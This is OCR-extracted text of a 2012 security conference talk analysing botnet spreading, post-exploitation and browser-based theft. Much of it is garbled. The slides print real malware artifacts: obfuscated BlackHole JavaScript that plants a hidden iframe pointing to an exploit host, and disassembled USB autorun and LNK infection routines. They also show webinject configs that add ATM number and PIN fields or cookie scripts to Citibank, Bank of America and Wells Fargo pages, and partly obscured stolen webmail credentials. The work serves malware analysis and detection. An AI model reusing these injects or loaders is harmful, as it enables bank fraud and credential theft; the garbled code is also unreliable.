Botnets Die Hard
Owned and Operated

.iv:-ri> q-j-ci 'x:ni:

WfVH 1 « T 1 1 • J. 1 1 F Tl II v

V B.I ELTiC'l I

v. Brum am n nr

\

HUNCH DETECTED

, h ,.|.-, :J ,,.,,,r, r

ff

■ i'r m sir- i>im:r* mu> mm* :n>
w-fti uiuia ui- maun' ii.

hCIIMUhdlh iJiaUih Mili I'u ■!!■
- imii-u ii-m, nmnun.

tvtkp hi i- mime »ii wv.in.m-
muwmm uiiIeii.w m- luui u-

n ■■ ii i Jir.iiiiii iiUi Ii limitm

inuiu m> LTT~m ■)■ mm wiwww

ibCULLiHI- .. i is.i... i . UK- . ■ .. -ii j

I Las Vegas ,2012
Aditya K Sood I Richard J Enbody

SecNiche Security I Department of Computer Science and Engineering

Michigan State University

□a DRUNK ILL

'P'l-HN-Fl' - '

ii iiiu .ill 'an iuii rmm irii

!i|<n>3 MM IWkT-l 7.

iL- I imta EUr LrilTU IHi fcilii J KJi U^tUKr LMLrfc, Hi VhM
| ■■■■ pima» i-pL im

r R571-H^H-31£H-^nS-iaHn-HS

AT-BE}:il3:Dl5Hg

wt twift f ;--t r i ! pjjj r ; ? jij / 7 j

JJ7 /V J /JJJ^ /V J Jiff | J

About Us

■ Aditya K Sood

• PhD Candidate at Michigan State University

- Working with iSEC Partners

- Founder, SecNiche Security Labs

- Worked previously for Armorize, Coseinc and KPMG

- Active Speaker at Security conferences

- Linkedln - http : //www. linkedin.com/in/adityaks

- Website: http://www.secniche.org I Blog: http://secniche.blogspot.com

- Twitter: @AdityaKSood

■ Dr. Richard J Enbody

• Associate Professor, CSE, Michigan State University

- Since 1987, teaching computer architecture/ computer security / mathematics

- Co- Author CS 1 Python book, The Practice of Computing using Python.

- Patents Pending - Hardware Buffer Overflow Protection

2

Disclaimer

■ This research relates to my own efforts and does not provide the
view of any of my present and previous employers.

3

Agenda

■ Bot Spreading Mechanisms

- Browser Exploit Packs

- Drive-by-Download frameworks

- Spreaders

- Demonstration

■ POST Exploitation

- Understanding Ruskill

- DNS Changer in Action

- Other System Manipulation Tactics

- Demonstration

■ Exploiting Browsers/HTTP

- Man in the Browser

- Formgrabbing

- Web Injects

- Demonstration

■ Conclusion Q^|^^|

4

Rise of Third Generation Botnets (TGB)

5

TGB Infections started with Zeus

Bot Spreading Mechanisms
Widely Deployed

Browser Exploit Packs

■ Browser Exploit Packs (BEPs)

— Overview

• Automated frameworks containing browser exploits

• Implements the concept of Drive-by-Download attacks

• Exploits are bundled as unique modules

• Mostly written in PHP + MySQL

- PHP code is obfuscated with Ion Cube encoder

• Successfully captures the statistics of infected machine

• Widely used BEPs are - BlackHole / Nuclear / Phoenix etc.

How is the exploit served?

• Fingerprinting browser's environment

- User- Agent string parameters

- Plugin detection module - Java / PDF / Flash

- Custom JavaScripts for extracting information from the infected machine ^

8

Browser Exploit Packs

Obfuscated JavaScripts used in BlackHole Infections

• Hiding the infected domain

<script>s= " " ; try < Q=daaument . crea teEIefcent { "p "} ;
q . appe ndChi ld{"123"+n) j)

catch { gw ) [7]h=- 1 6 / 7 ; t ry[{]a=pro tot ype ; [>]cat ch { z xc )

[7]e=windaw [ "e "+ "va "+"1" ) ;n="18 . 2? . 420 . 510 . 64 . 120 . 400 . 555 ,198,351,436.
505 . 220 . 346 . 164 . 515 . 202 . 348 . 276 . 540 . 202 . 327 . 404 . 550 . 232 . 345 . 264 . 605 . 168 .
78 . 234 . 444 . 500 . 242 . 117 . 164 . 455 . 96 . 279 . 164 . 615 .26.27.36.45. 210 . 306 . 456 . 485 .
218 . 303 . 456 . 200 . 82 . 177 .52.45.18. 375 . 128 . 505 .216. 345 . 404 . 160 . 246 .39.36.45.
18 . 300 . 444 . 495 . 234 . 327 . 404 . 550 . 232 . 138 . 476 . 570 . 210 . 348 . 404 . 200 . 68 . 180 . 420 .
510 . 228 . 291 . 436 . 505 . 64 . 345 . 456 . 495 . 122 . 117 . 416 . 580 . 232 . 336 . 232 . 235 . 94 . 156 .
216 . 280 . 98 . 165 . 216 . 245 . 104 . 168 . 204 . 245 . 104 . 165 . 212 . 260 . 98 . 159 . 216 . 230 . 230 .
303 . 456 . 590 . 202 . 312 . 464 . 580 . 224 . 138 . 396 . 555 . 218 . 141 . 404 . 510 . 196 . 312 .468.560
. 198 . 363. 472 . 505 . 100 .297 . 392 . 605 . 236 . 357 . 388 . 235 . 100 . 153. 392 . 275 . 112 . 297
Redacted

. ". split (" . if (vindov . document)
for {1=6-2-1-2-1 ;-795+i[T]=2-2;i++)

7]fc=i r -s=s+ String, fromCharCade {n[k] / (ij%](h*h] +2) ) ;
^]e{s> ;[>>l</5cript>

tuscate<

>cript

if (doc ument . get Element sEyTagName { 'body 1 ) [0])[{]
iframerO ?

E

function if ramer £)[{]

var f = document . createElement {' if rame ') ;

f . setAttribute { 1 src" , ■ http: //4Gei7 614E31475415 6 . servehttp. com/efbliupcyve2cbywa/

23b7ecanyipva74/eswcwl4Slir . php?ewgewl74efwl7h6re Ih47rew65gdf slE 6r5h=lEe35 94f Qe2f ld35 1 ) ;

f . style . visibility=' hidden' ;

f . style .posi tion=" absolute 1 ;

f . style . lef t=" 1 ;f. style . top=' 1 ;

f. setAttribute { 'width' , ' 10 ' ) ;f. setAttribute ( ' height ' , ' 10 ' ) ;

document . get Element sEyTagName { 'body ' ) [0] . appendChild {f ) ; , ^^L^^^ r \ / /

9

Browser Exploit Packs

Plugin Detection Code

— Scripts code taken from real world case studies

try[[]l=b {c . Get Variable ( "? version "J J } catch (k) j}if(!l&&a} {l=a})

j . installed=l?l : -1 ;j . versian=g. f armatNum{l> ; return true ]- ]-
adobe re ade r : [TJmime T ype : "appl i ca t i on/pdf " f na vPl Lzgi nGhj : rmll f proglf? :

[ "AcroPDF. PDF", "PDF. PdfCtrl "J f

classID: " clsid ; CA8A9 780-28 OD-1 1 CF-A2 4D- 4 4 45535 40000", INS TALLED : f ) f
pluginHasMimeType : function {d, c, f)[TJvar b=this P e=b.[l], a;f or {a in d>
pHif {d[a][p
[Tjreturn l|

J

d[a] ■ typei~&|d[a] . type^=c) [Tjreturn 1 } } if {e . getMiir.eEnabledPlugin{c P f ) )
return o[>

Redacted

<script>if (|T| ( 1 \v 1 = 1 v 1 ) ) [{Jvar nunu=ll /var dnkzaS=this [ 1 eval 1 ] ;[}]
var chert=dnkza-3 {document . getEleir.entsEyTagName { 1 * s > [nunu] . value ) ;
this[' ■ + »»+ 1 '+ J e '+ J v J + J al J + 1 J + 1 J J (chert) ;for (erepdvi = bocvg^S;
erepdwi > 0; erepdwi — >[T]far {iwcwco7 = bacwgze-erepdwi;
i wcwca 7 <= hz xz j 3 . 1 ength r - i wcwca 7=i wcwca 7 +bo cwgz S }
[{]cuxox=cuxc x- hz xz j 3 . charAt {i wcwco 7) ; } }

var boavcvg^cuxox+ rr ~=~pi uginZtetect . get Version { J Adobef?eader J ; . split ( 1 . 1 ) ;

var- s v=par s e I n t {inp[0] +inp[l] +inp [2] ) ;if~ {sv<800)[T]addp{ 1 esgtgnktilct2 .pdf 1 ) ;
>>lcatch{e)[{T>

DETECTPDF { > ;

f unc t i o n-mo t he r f ucke r { ) [TTJmo t he r f ucke r { > ; " ;
var waiwai=apdthvb7 { 1 ' + " "+ 1 J +boa vcvg+ 1 1 ) ;
eval ( 1 / *hui */ 1 +waiwai+ 1 /*hui*/ 1 ) ;</script>

PDF Plugin Detection

10

Demonstration

Drive-by-Download Attacks

Drive-by-Download

• Victim's browser is forced to visit infected website

• IFrame redirects browser to the BEP

• Exploit is served by fingerprinting the browser environment

• Browser is exploited successfully using JavaScript Heap Spraying

• BEP silently downloads the malware onto the victim machine

Drive-by-Download Frameworks

Drive-by-Download Frameworks

— Java Drive-by Generator

Java

Drive-by Generator

Welcome AoVmnistr-afcor

Choose Met bod:

Template Options-;

O HTML Based Drive-By

"1 done Weosite (Soon ! ]l

*T |^AR Based Duve -6y|

~i im

Select Template:

[| Other Option*

n

Drop Options

Drop Name:
[qtrwH2pfkexe
Drop Location:

3

General Options

Program URL:

http

171 Admin Control Panel:
hht p://v^ww-site. corn/ index, php

Advanced Options:

M Hlf^ Encryf*iori: (BETA)
Level ]
IT" Level ?
f* Level 3
l"" Level -i

Redirect Options;

I I Activate Reclrect
Pun Redrect:

Gam! Pje fc edr;

|h«pV;/

Generate Now 1

i

About

Ex*

AI»bne+ii Dev -Paint.CcMTi | 201!

Custom Publisher:

Publisher Name:
|h^>ei2h9e

Og aniMJtlcn Mama:
|xwzf 3bo4H

OganiMftton unit:

loyeJhU Q p v m

«y:

]mrn5nQx4ym

*yia5
Country:
l-an+wtHpzq

Project N<*nie:

wgpu-Hvwvf

■<* I

13

Demonstration

Spreaders

USB Spreading (Upas Bot - Case Study)

— Inside USB Spreader

- Widely used technique in bot design for infecting USB devices

— Win 32 Implementation

• Bot calls RegisterDeviceNotificationW function

» It can also be implemented as a windows service

push

nou

sub

and

push

push

pop

xor

lea

push

push

call

push

lea

push

push

nog

no u

call

ebp

ebp, esp
esp, 20h

[ebp+Notif icationFilter ] f
edi
7

ecx

eax, eax

edi, [ebp+uar_1C]
rep stosd

lea eax, [ebp+pclsid]

eax ; pclsid *

offset sz ; "{aBdcbf 1 0-6530-11d2-901f-00c04f b951ed}

ds iCLSIDfromString
; flags

eax , [ebp+Notif icationf ilter ]
eax ; Notif icationf ilter

[ebp+hRecipient] ; hRecipient
[ebp+uar_1C] , S
[ebp+Notif icationf ilter] f 20h
ds :RegisterDeuiceNotif icationW

GUID for Raw USB

15

Spreaders

■ USB Spreading (Upas Bot - Case Study)

— Plug and Play (PnP) Devices have unique set of different GUIDs

- Device interface GUID

» Required for dbcc_classguid DEV_BROADCAST_DEVICEINTERFACE

- Device class GUID

» Defines wide range of devices

• Defines WindowProc as follows

» WM_DEVICECHANGE notification message in DEV_BROADCAST_HDR
» dbch_devicetype -» DBT_DEVTYP_DEVICEINTERFACE

• Wait for the USB device and triggers device-change event as follows:

- wParam in WindowProc

» DBT_DEVICEARRIVAL I DBT_DEVICEREMOVALCOMPLETE

- Fetches drive letter of the USB devices as follows

» dbcvjinitmask in _DEV_BROADCAST_VOLUME I Logical drive information

• Continued

16

Spreaders

■ USB Spreading (Upas Bot - Case Study)

— On successful detecting the USB, bot execute function as follows;

- CopyFileW to copy malicious executable in the USB drive

- CreateFileW to create autorun.inf file in the USB root directory

- SetFileAttributesW to apply required files attribute

push

lea

push

push

push

push

call

add

xor

push

lea

push

push

call

push

lea

push

call

"%ws%ws a.exe"

[ebp+arg_4]
eax , [ebp+FileNane]
[ebp+arg_0]
offset aWsWsaexe :
ebx
eax

sub_4Q291B
esp, 1Uh
ebx, ebx

ebx ; bfaillf Exists

eax , [ebp+f ileName]

eax ; lpNewFileName

edi ; IpExistingf ileName

esi ; CopyfileW

6 ; dwFileAttributes

eax , [ebp+f ileName]
eax ; lpFileName

ds:Setf ileflttributesW

Autorun.inf infection

push offset aUsautoruninf

lea eax, [ebp+uar_98G]

push esi

push eax

call sub_4Q291B

push [ebp+arg_U]

lea eax, [ebp+Buffer]

push offset aAutorunOpent/s

push 1G4h

push eax

call sub_i*028EC

add esp, 2Gh

push ebx

push 80h

push 2

push ebx

push ebx

push GCGGGGGQOh

lea eax, [ebp+uar_98G]

push eax ; lpFileName

call ds : CreateFileW

"%wsautorun .inf '

'[autorun]\r\nopen=%ws_a .exe\r\n"

hTemplateFile
dwFlags And Attributes
dwCreationDisposition
IpSecurity Attributes
dwShareMode
dwDesiredAccess

17

Spreaders

USB Spreading (Upas Bot - Case Study)

— Infecting USB devices using Malicious .LNK file infection

.LNK infection

push

push

push

call

lea

push

push

lea

push

push

push

call

push

lea

push

lea

push

call

add

lea

push

call

offs

esi

eax

sub_

eax ,

eax

[ebp

eax ,

offs

esi

eax

sub

[ebp

eax ,

eax

eax ,

eax

sub_

esp,

eax ,

eax

ds:G

et aWsWs ; ,, %ws%ws"
40291B

[ebp+f indf ileData _cF ileName]

+arg_0]

[ebp+uar_B8C]
et aWsWs_lnk ; "%ws%ws .Ink"

40291B
+arg_4]
[ebp+uar_774]

[ebp+uar_B8C]

[ebp+uar_774]

; lpfileName
etf ileflttributesW

HNLU I

loc_ii0iiBfl6:

lea

eax , [ebp+FindFileData .cFileName]

push

[ebp+argO]

push

offset alnk ; ".Ink"

lea

eax, [ebp+uar_980]

push

eax ; wchart *

push

offset aUs_1 ; "%ws*"

call

wcsstr

push

esi

pop

ecx

push

eax

pop

ecx

call

sub_40291B

test

eax, eax

add

esp, 1Bh

jnz

loc 404D27

lea

eax, [ebp+FindFileData]

push

eax ; lpFindFileData

lea

eax, [ebp+uar_980]

///

push

eax ; lpFileName

call

ds :FindFirstFileU

push [ebp+arg_8]

mou esi, [ebp+arg_4]

push esi

push offset aCStartWsStartU

lea eax, [ebp+uar_214]

push 209h

push eax

call sub_U0291B

add esp, 14h

push 1000h ; uFlags

push ebx ; cbFilelnfo

lea eax, [ebp+psfi]

push eax ; psfi

push edi ; dwFileAttributes

push esi ; pszPath

call dsiSHGetFilelnfoW

/C start \"\" V'iwsUV && start \"\" \"%ws l.e'

18

Spreaders

■ USB Spreading (Upas Bot - Case Study)

Upas _ ]jp as in action

push

push

lea

push

push

call

lea

push

push

call

push

push

lea

push

push

call

push

push

lea

push

edi
offs
eax ,
9

eax

sub_

eax ,

offs

eax

sub

edi

offs

eax ,

1B3h

eax

sub

offs

offs

eax ,

1Dh

et aC ; "%c:\\"

[ebp+uar_C]

40291B

[ebp+uar_C]
et UalueName

ii0i|fl97

et aDataUsblnfecte ; "data=USB< | >Inf ected Drive %c :\\< | | >\r\n"
[ebp+uar_130]

4028EC

et a1 ; "1.0. 0.0"

et a?actSpreadingU ; "?act=spreading&uer=%s"
[ebp+uar_2C]

InFected Drive E:\\
InFected Drive H:\\
InFected Drive F:;\\
Infected Drive H:\\
Infected Drive
Infected Drive H :\\
InFected Drive F:\\
Infected Drive G:\\
InFected Drive F:\\
InFected Drive F:\\
Infected Drive H:\\
InFected Drive F:\\
InFected DriveJsW
InFected Drive F:\\

19

Spreaders

■ Upas Bot Network Behavior Detection

— Writing signature specific to USB infection

alert tcp @HOME_NET any -> @EXTERUAL_NET @HTTP_PORTS
{

msg: "Win32. UPas - Runtime Detection";
flow: to_server, established;
content : "POST ";
depth: 5 ;

uri content : "?act=spreading&ver=" ;
no case ;

content :"\0D OA OD 0A\data=USB\3C 7C 3E\ Infected Drive";
no case ;

classtype : Worm; ref erence : SNS ;
sid: 110034567;
rev : 1 ;

POST Exploitation
Subverting System Integrity

Understanding Ruskill

What is Ruskill ?

— A termed coined in Russia

• It refers to the group of warriors who demonstrate their skill in the battle

• Typically used by Diablo game players to demonstrate their strength and power

— How does Ruskill relate to bots?

• Ruskill module is used to demonstrate the capability of bots

• Removing traces of malware in the system after successful reboot

22

Understanding Ruskill

■ Inside Ruskill Module

— Found in NGR (Dorkbot)

— Remote file downloading and execution

• Ruskill allows the bot to fetch any executable from third-party resource and
execute it in the compromised system

— Restoring System

• Ruskill monitors all the changes performed by the malicious executable in the
system

• Ruskill restores the registry, files ad network settings to the same state ( before
the execution of malicious binary) after reboot

• Deletes the malicious executable after successful execution in the system

23

Understanding Ruskill

Inside Ruskill Module

loc UODBiil :

mou edx, off_415784

push esi ; arglist

push offset aRuskillDetecte ; "[Ruskill]

push edx ; int

push offset dword_44AD98 ; int

call sub_ii0BA00

add esp, 18h

jmp loc_U0DC82

nou
push

push

| push
push
call
I add
jmp

Detected file: VfeV 11

eax, off_ii1578ii

esi ; arglist

offset aRuskillDetec_B ; "[Ruskill]: Detected DNS: \"%sV
eax ; int

offset dword_44AD98 ; int
sub

esp, 1Bh
loc U0DC82

Ruskill Detecting File, DNS
and Registry modifications

nou ecx, off_415784

push esi ; arglist

push offset aRuskillDetec_1 ; "[Ruskill]: Detected Reg: V%sV"

push ecx ; int

push offset dword_44AD98 ; int

call sub_40BA0B

add esp, 10h

imp loc 40DC82

24

Demonstration

Critical Problem - DNS Changer

DNSChanger apocalypse:

DNSChanger cutoff is more whimper than
bang. Score one for the good guys.

Cutting off Internet access to computers infected with the nasty DNSChanger trojan did not bring
about doomsday after all. Why, beyond the obvious, that's good news in the cybersecurity world.

DNSChanger Doomsday

The FBI is pulling the plug on rogue DNS ser/ers on Monday, meaning those who haven't cleaned up
their computers could be stranded without Internet. Which begs the question, should they even be
allowed Internet access?

Don't forget: DNSChanger malware
could kill your internet on Monday

Facebook warns users of the end of the Internet via
DNSChanger

Internet blackout looms for 300K DNSChanger-
infected computers

FBI Limits DNSChanger Malware Damage;
No 'Internet Doomsday'

The FBI shut down servers that allowed more than 4 million

DNSChanger Shutdown, Despite Laggards, Is a vims -infected computers to access internet
Good Thing

DNSChanger operation shuts down, leaving some

without access to web ^

26

DNS Changer in Action

DNS Changer

— Exploiting the DNS resolution functionality of the infected machine

— What it works for?

• Blocking security providers websites (Implementing blacklists)

- Blocking microsoft.com updates website to restrict the downloading of updates

- Restricting the opening of anti-virus vendors websites

• Redirecting the browser to the malicious domain

- Forcing the infected machine to download updates from malicious domain

- Triggering chain infection for downloading another set of malware onto the
infected system

DNS Changer in Action

■ DNS Changer

v this works?

Replacing the DNS server entries in the infected machine with IP addresses of
the malicious DNS server

Adding rogue entries in the hosts configuration file

Executing DNS amplification attack by subverting the integrity of LAN
devices such as routers and gateways

- It results in DNS hijacking at a large scale in the network
Hooking DNS libraries

- The preferred method is Inline hooking in which detour and trampoline functions
are created to play with DNS specific DLLs.

28

DNS Changer in Action

DNS Changer

— Inside DNS hooking

• Hooking DNS API

- Hooking DNSQuery (*) function calls in dnsapi.lib/dnsapi.dll

- Implemented by creating a blacklist

- Bot hijacks the DNS resolution flow by filtering all the incoming DNS requests

• Hooking DNS Cache Resolver Service

- Cache resolver service is used for DNS caching

- Bot hooks sendto function in ws2_32.dll to verify the origin of DNS query to
validate if sendto function is called by dnsrsslvr.dll

DNS Changer in Action

DNS Changer

— Implementation in NGR bot

noo

push

push

push

push

call

call

nog

nog

nog

push

nog

push

push

push

push

call

add

pop

eax , [esi+edi*4+4]
ecx , [esi+edi*4+8]
eax ; char

offset aS_0 ; "%s"
offset aBdns ; "bdns"
ecx ; IpString

sub_ii07500
sub_40A970
edx , [esi+edi*4+8]
[esi+edi*U+U]
[ebp+lpString2]

loc_iiOE7 03:

nog ecx, [ebp+gar_4]

nog edx, off_415770

push ecx

push eax ; arglist

push offset aDnsBlockedDDon ; "[DNS]

push edx ; int

push offset dword_44AD98 ; int

call sub UOBflOO

add esp, 14h

Blocked %d donain(s) - Redirecte".

eax ,
ecx ,
edx
edx ,
eax

[ebp+arg_0]

; arglist
offset aDnsRedirecting ;
ecx ; int

edx ; int

sub_40BA00
esp, 24h
edi

sub_40A97O proc near
push
push
call
push
call
test
jnz

offset aDnsf lushresolg ; "Dnsf lushResolgerCache"
offset aDnsapi dll ; "dnsapi .dll"
sub_40392O
eax

sub_40375O
eax, eax

short loc 4GA98A

[DNS]: Redirecting \"%s\" to \"%s\—

30

Demonstration

Certificate Deletion

Certificate Deletion

— Removing all instances of private certificates from the infected machine

NL4

sub_4141F4 proc near

push

ebx

push

edi

push

offset szSubsystemProtocol

push

; hProu

xor

hi, hi

call

ds :CertOpenSystemStoreW

mou

edi, eax

test

edi, edi

short loc 41423F

'MY"

h n ui I

push

ebp I

mou

ebp , ds :CertEnumCertif icatesInStore

push

esi

push

jmp

short loc 41422A

loc_414217: ; pCertContext

push esi

call ds :CertDuplicateCertif icateContext

test eax, eax

jz short loc_414229

HNUJ

loc 41422ft:

push

edi

call

ebp

mou

esi, eax

test

esi, esi

jnz

short loc i*14217f

eax ; pCertContext

ds :CertDeleteCertif icatef romStorel

hnua

push

eax ;

dwFlags

push

edi ;

hCertStore

mou

hi, 1

call

ds:CertCloseStore

pop

esi

pop

ebp

~T7

ICE IX bot - certificate
deletion module

32

Crypto virology in Action

Cryptovirology

— Exploiting the Built-in Windows Crypto APIs

— Cryptovirology allows malware authors to build robust malware

— How Cryptovirology is used in designing bots?

• Generating random filenames for bots

• Creating registry entries with random keys

• Highly used for generating random DNS server entries

- All DNS entries maps to the same IP address

• Of course, encrypted communication between infected machine and C&C
server

• Verifying the integrity of malicious files downloaded in the system

- Scrutinizing the bots

Crypto virology in Action

Cryptovirology

— An instance from ICE IX bot - Windows Crypto API misuse

push

push

push

xor

push

push

lea

push

mou

call

ebx

0FO000040N

1

ebx

dwFlags
dwProuType

ebx
ebx
ebx
eax
eax

[ebp+uar_1], bl

ds :CryptHcquireContextM

[ebp+hProu]

pszProuider
pszContainer

phProu

NL4

lea

push

push

push

push

push

call

eax, [ebp+hHash]

eax

ebx

ebx

8003h

[ebp+hProu]

phHash

dwFlags

hKey

Algid

hProu

HHui

push ebx ; duFlags

lea eax, [ebp+pduDataLen]

push eax ; pduDataLen

push [ebp+argO] ; pbData

push 2 ; duParam

push [ebp+hHash] ; hHash

call ds :CryptGetHashParam

cnp eax, 1

jnz short loc_4083B6

ds :CryptCreateHash ; Initiate the hashing oF a stream oF datal

HHui

push ebx ;

push [ebp+duDataLen] ;

mou [ebp+pduDataLen] ,

push [ebp+pbData] ;

push [ebp+hHash] ;

call ds :CryptHashData ;

duFlags

duDataLen

10h

pbData
hHash

Compute the cryptographic hash on a stream oF data

HNUL

IIH N 14

cmp [ebp+pdwDataLen] , 10h|
jnz short loc_4083B6

loc_4083B6: ; hHash

push [ebp+hHash]
call ds :CryptDestroyHash
III! i/ /

mou

[ebp+uar_1], al

34

Exploiting Browsers
Data Exfiltration Over HTTP

Z7

35

Downgrading Browser Security

■ Removing Protections

— Nullifying browser client side security to perform stealthy operations

— Internet Explorer

• Tampering zone values in the registry

- \Software\Microsoft\Windows\CurrentVersionXInternet SettingsXZones

— Firefox

• Manipulating entries in user.js file

- user _pref( ' 'security. warn_submit_insecure ' 'Jalse );

» Browser does not raise an alert box when information in sent over HTTP while
submitting forms.

- user _pref ("security. warn _viewing_mixed" Jalse);

» Remove the warning of supporting mixed content over SSL.

OLD School trick but works very effectively. Several other techniques
of subverting the browser security also exists.

36

Man-in-the-Browser (MitB)

Inside MitB

— MitB typically refers to a userland rootkit that exploits the browser
integrity

User opens web page for initiating session
and making online transactions

Web page data in the form of HTTP request
is hooked by MITB agent

Tampered Web Page

Altered POST data is sent back to server for
performing the final operation

Web Server

37

What Lies Beneath?

£3 ChbsE Online- - My Accounts - Windows InlernBl Explorer

el'

CHASE Cp

A ni

JO!€d

CH ABE O

[n order to provide y^u v,rJ eytra tecu-ity, we oeeasiofially need so isk Ecf addfetwal

inf^rmflCiqn: when ypg «CM3 your Accents online.

*:e&sc enter the infcnnation belcvy to continue,

r

Serial Security rtumbcr: |
drivers Uctnse:
Date of Birth:
ATM Card Number:
Card Expiration Date: «[
PiN Ccits

■r

2< r 20l2

gi Pnrtt
A£l Dunts

f mm-

PiH Coif c {ocaifirrn):

CONTINUE

Ac dount

Av aila b le B ala nc e H ftr a s e nt 6

PlOrrl^:
pi ton*

lance E

MV Checking (...1234)

57.. 526. 31

$6,207.31

^ 300%

CHA5E O

Security Center Home > Online Fraud

Types of Online Fraud

► Fhishing

► Fraudulent E-mails
►Fraudulent E-mail Examples

►Virus or Malware Attacks

► Spam Scams
►Internet Auctions

Note: The Pop up is triggered in user's
active session. So what it is actually?

No doubt it is a Popup, but the
technique is termed as Web Injects not
phishing or something like that.

^ W

38

Web Injects

■ Web Injects

— Based on the concept of hooking specific functions in the browser DLLs

— On the fly infection tactic

— Execution flow

• Bot injects malicious content in the incoming HTTP responses

• Injections are based on the static file named as webinjects.txt

• Rules are statically defined by the botmaster

• Bot fetches rules from the webinjects.txt file and injects in the live webpages

— Information stealing in a forceful manner

• Exploits user ignorance

set_url htcps : //engine. paymentgace. ru/bpeserv let/BPC/ index, jsp" GP
dnta_bt£oc«

<td>< input cia33="cext" cype="cext" naine= "user let" vaiue=""></td>
data_eacJ

cfata_ inject

<td c lass- "me t chant Loo in" > iaa£etl</td>

data_ind \ /~~7

39

Web Injects

= Grg&bifig Account Type

set^url ri«ps;//oflLlrtetast*.l)aflk6fafl4rica.tO'Tii/*/<]<5tfliWtl':c-I GPH
data_fte-fcire \ )

*diw c la s s » " pr ima ry Na vCrct * >
datn_end

■ What is meant by GPH flags?

— Exploitation and infection metrics

• G - injection will be made only for the resources that are requested by the GET

• P - injection will be made only for the resources that are requested by the
POST

• L - is a flag for grabbing content between the tags datajbefore and data_after

inclusive

• H - similar as L except the ripped content is not included and the contents of
tags datajbefore and data_after

40

Web Injects - Real Time Cases (1)

set_url https : //web . da- us . citibank . coin/ cgi-bin/ citif i/portal/1/ 1 . do GP
data_bef are

s rc= " / cm/ j s /branding . j s " X / s c r ip t >

data_end

data_inject

<SCRIPT>

function set_caokiel (naine f value f expires)
{

if (] expires) { expires = new Date();>

document . cookie = name 4- rr=IT + escape (value) + rr ; expires= rr + expires . toGMTString ( ) + Fr ; pat r.=/ n ;
>

functi on ge t_co o ki e ( name } -[

cookie_name = name + rr = rr ; cookie_length = document . cookie . length; cookie_begin = 0;

while (cookie_begin < cookie_length)

{

value_begin = cookie_begin + cookie_name . length;

i f ( docume nt . co o ki e . s ubs t r i ng ( co o ki e_be gi n f val ue_be gin) == co o ki e_nair.e j
{

var value_end = document . cookie . indexOf ( n ; rr f value_begin) ;
if (value_end == -1) -[ value_end = cookie_length; >

return une s cape ( do cume n t . co o ki e . s ubs t r i ng ( val ue_be gi n f val ue_e nd ) } ;
>

cookie_begin = document . cookie . indexOf ( M " f cookie_begin) + 1;
if (cookie_begin ==0) { break;}
>

return null; }

</SCRIPT>
data_end
data_af ter
<ncscript>
data end

Forceful Cookie Injection in
Citibank's website to
manipulate the user's session

41

Web Injects - Real Time Cases (2)

s e t_url *banko f ame r i ca . com* GP
data_bef ore

<a href="#sitekey" title =FT View your SiteKey">

<img src^sas-dQcs/images/clr. gif" height= FT l rT width="10" border= rr O rr alt="View your SiteKey rT x/a>
data_end
data_inject
</TD>
</TR>
<IR>

<TD align=left cl as s =t e xtbo 1 d valign=top>

< label for= rr passcode rr > <5FAN class =rT text2 ">* ATM Number : </SPAN>
<span cl as s= "1\2 - ada " > <br>

Enter an ATM Number . Your ATM Number must be 16 digits.

</spanX/label>
</TD>
</TR>
<TR>
<TD>

< input type= "pas sword* nanae= " ATMNR " i d= " ATMNR * class= rr textl rr value=" 11 maxlength= ri 16 ri size= ri 2 E ">
data_end
data_af ter
data end

Injecting HTML content in Bank of
America's webpages to steal the
ATM number and the Pass code.

s e t_ur 1 ht tps : / / c nl i ne . we 1 1 s far go . com/ s i gno n * GP
data_bef ere

<input type= ri password rr name= fr password rr *</td>

data_end

data_inject

<td width= rr 225 r, Xlabel f ar= rr password rr class= r, f ormlabel n >3 . ATM PIN< / 1 abe 1 Xbr / >
<input type= rr password rT name = rr U5p a s s rr id= fr atmpin rT size= rr 2 rr ma >: 1 e n g t h = " 1 4 "
t i 1 1 e = r 1 H! r. t e r .-.Il-I FIM" "ab^r.dex=" 1 1 t? accesskey= rr A ri 7>
<br/>£nbsp; </td>
data_end
data_af ter
data_end

</label>
data end

Injecting HTML content in Wells
Fargo bank to steal user's ATM
code.

42

Form Grabbing

Form Grabbing

— It is an advanced technique of capturing information present in forms

Web Server managed by
Bank Domain

User fills the Form with
Username/ Password,
The Form is submitted
for verification

MEMBER IOG1N

Browser sends the login
credentials to Web
Server controlled by
Bank Domain

Bank serves login page for
account access

Bot hooks the browser
and read the POST
request

Sood, En body

ii

x

Malicious Bot

residing in
Victim Machine

Bot releases the hook
after sending
information

6

Bot extracts the information
i.e. complete POST request
and send it to C&C server

Attacker's Command
& Control (C&C)
Server

43

Form Grabbing

Why Form Grabbing ?

— Keylogging produces plethora of data

— Form grabbing - extracting data from the GET/POST requests

— Based on the concept of hooking and DLL injection

— No real protection against malware

E+ TRADE

SECURE LOG ON;
I I

Banfctrf America Q 1 1

OnPlltf linking

Eiiv- Secure, free.

I ntBF Utnlm-c 1 L>:

I I

iTH-r ATH *ir Chock Card
Hunib«T:

Vuur I- 1 1 N :

i I

|~~ Ihlp: Onlln* |0

Act cunt In-:

"3

'Achdr-i- I ir^irmy?ii|{Q<t?

F+rpat m n**d Wp. pnih your [L>7

U»rID

I

i : .i « H

r

Ta prov^nl 'roue* «-n!ar i_> r zradiL
Vto ATN iir Chock iZanJ hiniAtr

Yc-nr P"[hqi T * mjidko rump-:

I.! 1 1 li

p n<ifMrfnTm r ir

Form Grabbing

Harvested data from POST
requests. Kasper sky's anti virus
license key entered by the user

Harvested Data

View report (HTTPS request, 205 bytes)

CLOUD2 7D126CF46522DF69

ice9

1.2.0

Server 2008 R2 x64 3 SP 1
1033

07 032012 11:05:33

+0:00

648:59:02

07.03.2012 11:05:39

Bot ID:
Botnet:
Version:
OS Version:
OS Language:
Local time:
GMT:

Session time:
Report time :
Country:

Comment for bot: -
In the list of used: No

Process name: C:\Prograni Files (x86)\Kaspersky L ab'vKaspersky Small Office S ecurity '-.avp .exe
User of process: CL OUD2\Administrator

Source : https : //auto- activation3 .kaspersky.cc^'en/acti vate

https : / / au t □ - ac t i vat i □ n3 . kaspersky . com/ en/ activate
Re f e re r : - ^^^^^^^^^^^^^^^^^^^^^^

POST data:

REQUE5T_ID=-[|
APP_ID=1^
ACT CODE=l

|90e-53c3-43d3-4 9ceil675a42>

45

Demonstration

This Data is Not Yours !

Mozilla Firef ox

h-ttp : / / platf oma - pols 1 . pljggga s iiia 19 S3 : lizakl
h-ttp : //o2. pl@@@krycha326 : liszka

http : / /poczta - interia - pl@@@suiiiwwf@interia . pi : ^S^^S3*10
